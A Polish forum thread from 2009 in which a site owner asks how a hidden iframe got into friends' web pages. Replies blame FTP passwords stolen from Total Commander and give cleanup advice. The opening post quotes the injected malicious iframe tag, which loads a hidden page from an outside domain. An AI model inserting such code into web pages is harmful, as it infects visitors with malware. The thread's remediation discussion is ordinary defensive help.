rgt 0 Zgłoś post Napisano Maj 1, 2009 Witam. Jak sądzę znajomi padli ofiarą kogoś "miłego" i pojawił się u nich w kodzie stron dodatkowy kod z iframe, np: <iframe src="http://lotmachinesguide.cn/in.cgi?income58" width=1 height=1 style="visibility: hidden"></iframe> Jak zaradzić na przyszłość takim sytuacjom? To "wina" firmy hostingowej czy wina samego skryptu? (jeden przypadek to sklep z shoper.pl) R. Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość Active-Hosting Zgłoś post Napisano Maj 1, 2009 Poczytaj o wirusie przechwytującym hasła z TC przez złe szyfrowanie TC. Zmień klienta FTP i poczekaj na nową wersje TC. Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość RuFiK Zgłoś post Napisano Maj 1, 2009 1. skan komputerów ktore maja dostep do konta hostingowego 2. zmiana hasel na ftp 3. zglos do boku w celu wyciagniecia szczegolowych logow 4. glowa do gory ps. jak nie piszesz komunikatu ze google blokneli www to jeszcze jest gut sytuacja Udostępnij ten post Link to postu Udostępnij na innych stronach
rgt 0 Zgłoś post Napisano Maj 1, 2009 Czyli to raczej wynik dostępu do ftp (przechwycenie hasła)? R. Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość RuFiK Zgłoś post Napisano Maj 1, 2009 Tak Udostępnij ten post Link to postu Udostępnij na innych stronach
rgt 0 Zgłoś post Napisano Maj 1, 2009 A co jeśli Google już ma na swojej "czarnej liście"? Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość RuFiK Zgłoś post Napisano Maj 1, 2009 sprawdz skrzynke mail admin@domena google z automatu wysyla powiadomienie i jakie nalezy podjac kroki zeby bloka zostala usunieta. pzdr. Udostępnij ten post Link to postu Udostępnij na innych stronach
xorg 693 Zgłoś post Napisano Maj 1, 2009 http://cs-puchatek.pl/topics189/wirusy-na-...for-vt22181.htm Tutaj conieco opisałem. Udostępnij ten post Link to postu Udostępnij na innych stronach
Konrad Z. 1 Zgłoś post Napisano Maj 2, 2009 Moze to tez byc wynik tego, ze strona nie jest zabezpieczona przed atakiem HTML insertion i ktos wrzucil HTML do bazy danych Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość RuFiK Zgłoś post Napisano Maj 2, 2009 Moze to tez byc wynik tego, ze strona nie jest zabezpieczona przed atakiem HTML insertion i ktos wrzucil HTML do bazy danych watpie ... mialem statyczna strone i bot podmienil mi plik index.html .... via ftp Udostępnij ten post Link to postu Udostępnij na innych stronach
Edart 239 Zgłoś post Napisano Maj 2, 2009 1. skan komputerów ktore maja dostep do konta hostingowego2. zmiana hasel na ftp 3. zglos do boku w celu wyciagniecia szczegolowych logow 4. glowa do gory 1. ok 2. ok - dodatkowo: nie zapisywać hasła 3. do niczego się nie przyda 4. a nawet wyżej najprostsza metoda na pozbycie się wrzoda i w dodatku skuteczna Udostępnij ten post Link to postu Udostępnij na innych stronach
Malitek 1 Zgłoś post Napisano Maj 2, 2009 Antywir: http://download.eset.com/eval/win/eav/eav_nt32_plk.msi Napisz na PW a dam licencje do 23 lipca Wykrywa ten shit.. Jak usuniesz i znów podczas przeglądania Nod da komunikat o wirusie sprawdź jeszcze raz .. Ja miałem tak że pododawał się 25 kwietnia (w Total Comanderze data edycji .. ) usunąłem ( był backuz z dnia poprzedniego) I po 2 dniach znowu komunikat jak do PA wbijałem no to hmm lukam a tu plik miał to wpisane nie 25 kwietnia a 14 + nie na końcu a pośrodku .. Udostępnij ten post Link to postu Udostępnij na innych stronach
verde 4 Zgłoś post Napisano Maj 3, 2009 Moj kolega mial identyczny przypadek dodany wlasnei podobny wpis. Antywir , po wejsciu an stronei wykrywal ze na strone jest robak Wystarczylo Przeskanowac komuter skasowac kod na stronei zmienci hasla do serwera ftp, od miesiaca jest poprawana sytuacja . Udostępnij ten post Link to postu Udostępnij na innych stronach
Malitek 1 Zgłoś post Napisano Maj 3, 2009 Za każdym razem jak skończycie coś robić na FTP wejść do totala i zmienić hasło na lol '] Udostępnij ten post Link to postu Udostępnij na innych stronach
kacka 0 Zgłoś post Napisano Maj 3, 2009 Również zapisywanie haseł w filezilla nie jest bezpieczne. Udostępnij ten post Link to postu Udostępnij na innych stronach
rgt 0 Zgłoś post Napisano Maj 4, 2009 Udało się wszystko poukładać, nawet z gogle Dzięki za odzew. Udostępnij ten post Link to postu Udostępnij na innych stronach
Malas 0 Zgłoś post Napisano Maj 4, 2009 Za każdym razem jak skończycie coś robić na FTP wejść do totala i zmienić hasło na lol '] kto jeszcze z tego starocia korzysta, można choćby z fireftp w firefoxie korzystać i nie ma zabawy w zmianie haseł po każdorazowym użytku ftp Udostępnij ten post Link to postu Udostępnij na innych stronach
p 3 Zgłoś post Napisano Maj 4, 2009 kto jeszcze z tego starocia korzysta, można choćby z fireftp w firefoxie korzystać i nie ma zabawy w zmianie haseł po każdorazowym użytku ftpStarocia? Pokaż mi lepszy menadżer plików pod Windowsa... No i jakby umknęło to Twojej uwadze, to Total Commander nie jest tylko klientem FTP, więc sugerowanie śmiesznych dodatków do Firefox'a jest co najmniej bez sensu... Udostępnij ten post Link to postu Udostępnij na innych stronach
Malas 0 Zgłoś post Napisano Maj 4, 2009 Starocia? Pokaż mi lepszy menadżer plików pod Windowsa... No i jakby umknęło to Twojej uwadze, to Total Commander nie jest tylko klientem FTP, więc sugerowanie śmiesznych dodatków do Firefox'a jest co najmniej bez sensu... Fakt tu masz rację, chodziło mi tylko i wyłącznie o usługę FTP w TC. Czemu śmiesznych?Jest bynajmniej bezpieczny. Tak to jest z popularnymi programami. Udostępnij ten post Link to postu Udostępnij na innych stronach
herki 0 Zgłoś post Napisano Maj 4, 2009 nie nalezy takze zapisywac hasel w Fireftp w Firefox'ie poniewaz z tamtad tez kradnie loginy i hasla Udostępnij ten post Link to postu Udostępnij na innych stronach
p 3 Zgłoś post Napisano Maj 4, 2009 Czemu śmiesznych?Jest bynajmniej bezpieczny.Skoro jest dodatkiem do Firefox'a, to musi być śmieszny Udostępnij ten post Link to postu Udostępnij na innych stronach
Malas 0 Zgłoś post Napisano Maj 4, 2009 nie nalezy takze zapisywac hasel w Fireftp w Firefox'ie poniewaz z tamtad tez kradnie loginy i hasla jeżeli ktoś nie umie się zabezpieczyć. p : takie tezy to wiesz. Udostępnij ten post Link to postu Udostępnij na innych stronach
kafi 2425 Zgłoś post Napisano Maj 4, 2009 Już tak nie idealizuj swojego ulubionego Firefoksa. jeżeli ktoś nie umie się zabezpieczyć. Jeżeli ktoś umie się solidnie zabezpieczać, to nawet Total Commander jest dla niego bezpieczny. A jeżeli nie umie - to Fx jest równie dziurawy, jak TC. Udostępnij ten post Link to postu Udostępnij na innych stronach
is_wm 287 Zgłoś post Napisano Maj 4, 2009 A czy ma ktos w miare gotowe rozwiazanie do zabezpieczenia od strony serwera? Cos na wzor daemona (np) ktory sprawdza/filtruje dane przesylane przez Ftp ? Udostępnij ten post Link to postu Udostępnij na innych stronach
beliq 442 Zgłoś post Napisano Maj 4, 2009 A czy ma ktos w miare gotowe rozwiazanie do zabezpieczenia od strony serwera? Cos na wzor daemona (np) ktory sprawdza/filtruje dane przesylane przez Ftp ? Istnieje taka możliwość, nie mniej jednak wdrożenie tego nie jest proste, a overhead jest jednak odczuwalny, bo daemon musi po przesłaniu każdego pliku przeparsować jego zawartość... Udostępnij ten post Link to postu Udostępnij na innych stronach